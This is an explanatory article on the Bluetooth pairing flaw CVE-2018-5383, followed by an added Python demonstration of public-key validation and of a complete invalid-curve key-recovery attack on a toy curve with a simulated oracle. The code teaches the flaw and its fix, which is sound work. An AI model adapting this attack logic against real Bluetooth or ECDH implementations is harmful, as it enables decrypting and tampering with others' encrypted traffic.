CVE-2018-5383 affects firmware or OS drivers from Apple, Broadcom, Intel and Qualcomm. At the time of writing, the implications of the bug for Google Android and Linux are unknown.
The researchers found that the Bluetooth® specification recommended, but did not require, that a device supporting either of the two affected pairing features (Secure Simple Pairing and LE Secure Connections) validate the public key it receives over the air during the pairing handshake. Because the check was optional, some vendors' implementations did not verify that the peer's elliptic curve public key is actually a point on the agreed curve. An attacker within Bluetooth® range of the target device(s) can exploit this to mount a Man In The Middle attack: by injecting invalid public keys into both sides of the Diffie-Hellman key exchange, they can determine the session key with high probability, decrypt all traffic the users believe to be encrypted, and inject messages of their own, including malware.
The Bluetooth® SIG have issued the following statement:
"For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth® devices that were going through a pairing procedure. The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgment to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful."
How to stop Bluetooth® hacks
The Bluetooth® SIG has updated the specification to make public key validation mandatory, and says it has no evidence of the bug being exploited maliciously.
Patches will be needed and users should obtain them directly from their device and OS vendors. Apple and Intel have already released fixes.
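To make concrete what "validating the public key" means and why skipping it matters, here is an added example; it is my own illustration, not the researchers' code or any vendor's pairing stack. It implements the curve arithmetic an ECDH pairing runs, the validation check the SIG has now made mandatory, and, on a constructed toy curve y^2 = x^3 + 2x + 3 over F_97 (the prime, coefficients, base point search and the DHKey "oracle" are all assumptions chosen so the attack runs in pure Python; a real device exposes its DHKey only indirectly through the pairing confirmation values, and the real curve is P-256), the invalid-curve attack itself: the attacker hands the victim points of small prime order that lie on a different curve, reads the victim's private key modulo each order off the resulting x-coordinate, and combines the residues.

```python
import itertools

INF = None  # the point at infinity

def on_curve(p, a, b, P):
    """INF, or in-range (x, y) satisfying y^2 = x^3 + ax + b mod p."""
    if P is INF:
        return True
    x, y = P
    return 0 <= x < p and 0 <= y < p and (y * y - x**3 - a * x - b) % p == 0

def add(p, a, P, Q):
    """Point addition. b is never used: an unvalidated point silently moves the computation onto another curve."""
    if P is INF or Q is INF:
        return Q if P is INF else P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return INF
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(p, a, k, P):
    """Double-and-add scalar multiplication k*P."""
    R = INF
    while k:
        if k & 1:
            R = add(p, a, R, P)
        P, k = add(p, a, P, P), k >> 1
    return R

def x_of(R):  # Bluetooth derives DHKey from the x-coordinate alone
    return None if R is INF else R[0]

def validate_public_key(p, a, b, n, Q):
    """The now-mandatory check: reject INF, bad coordinates, off-curve and small-subgroup points."""
    return Q is not INF and on_curve(p, a, b, Q) and mul(p, a, n, Q) is INF

TOY_P, TOY_A, TOY_B = 97, 2, 3  # constructed toy curve y^2 = x^3 + 2x + 3 over F_97 (assumption)

def point_order(p, a, P, limit):
    """Smallest k <= limit with k*P = INF, else None."""
    R, k = P, 1
    while R is not INF and k <= limit:
        R, k = add(p, a, R, P), k + 1
    return k if R is INF else None

def curve_points(p, a, b):
    """All affine points of a small curve, via a square-root table."""
    roots = {}
    for y in range(p):
        roots.setdefault(y * y % p, []).append(y)
    return [(x, y) for x in range(p) for y in roots.get((x**3 + a * x + b) % p, [])]

def toy_generator():
    """A base point of maximal order on the toy curve, with that order (found by brute force)."""
    limit = TOY_P + 2 + 2 * int(TOY_P**0.5)  # Hasse bound on the group size
    G = max(curve_points(TOY_P, TOY_A, TOY_B), key=lambda P: point_order(TOY_P, TOY_A, P, limit))
    return G, point_order(TOY_P, TOY_A, G, limit)

def small_order_point(p, a, b, order):
    """Attacker: a point of exactly `order` on some OTHER curve with the same p and a (fails on_curve for b)."""
    for b2 in range(p):
        if b2 == b or (4 * a**3 + 27 * b2 * b2) % p == 0:  # skip the real curve and singular ones
            continue
        for P in curve_points(p, a, b2):
            if point_order(p, a, P, order) == order:
                return P
    return None

def victim_dhkey(d, Q):
    """Victim's pre-fix ECDH: Q goes straight into the scalar multiplication, unvalidated (simplified oracle)."""
    return x_of(mul(TOY_P, TOY_A, d, Q))

def recover_private_key(d):
    """Attacker recovers d from the victim's public key d*G and the DHKey oracle alone: each invalid point
    of prime order ell leaks d mod ell up to sign (x-only), CRT combines residues, the public key picks signs."""
    G, N = toy_generator()
    pub = mul(TOY_P, TOY_A, d, G)
    residues, modulus = [], 1
    for ell in (2, 3, 5, 7, 11, 13):
        Q = small_order_point(TOY_P, TOY_A, TOY_B, ell)
        if Q is None:
            continue
        seen = victim_dhkey(d, Q)
        cands = {k for k in range(ell) if x_of(mul(TOY_P, TOY_A, k, Q)) == seen}
        residues.append((ell, cands))
        modulus *= ell
        if modulus > N:  # enough residues to pin d down uniquely
            break
    for choice in itertools.product(*[c for _, c in residues]):
        x = 0
        for (ell, _), r in zip(residues, choice):
            m = modulus // ell
            x = (x + r * m * pow(m, -1, ell)) % modulus  # CRT
        if x < N and mul(TOY_P, TOY_A, x, G) == pub:
            return x
    return None
```

Call `recover_private_key(d)` for any d below the base point's order returned by `toy_generator()` and it hands back d; the attacker never touched the genuine curve. Pass the same attacker point through `validate_public_key` with the genuine b and it is rejected at `on_curve`, which is the entire fix the SIG has now made mandatory. The same function applies unchanged to P-256 with the standard parameters, and the `n*Q = INF` term is what additionally stops small-subgroup points on the real curve.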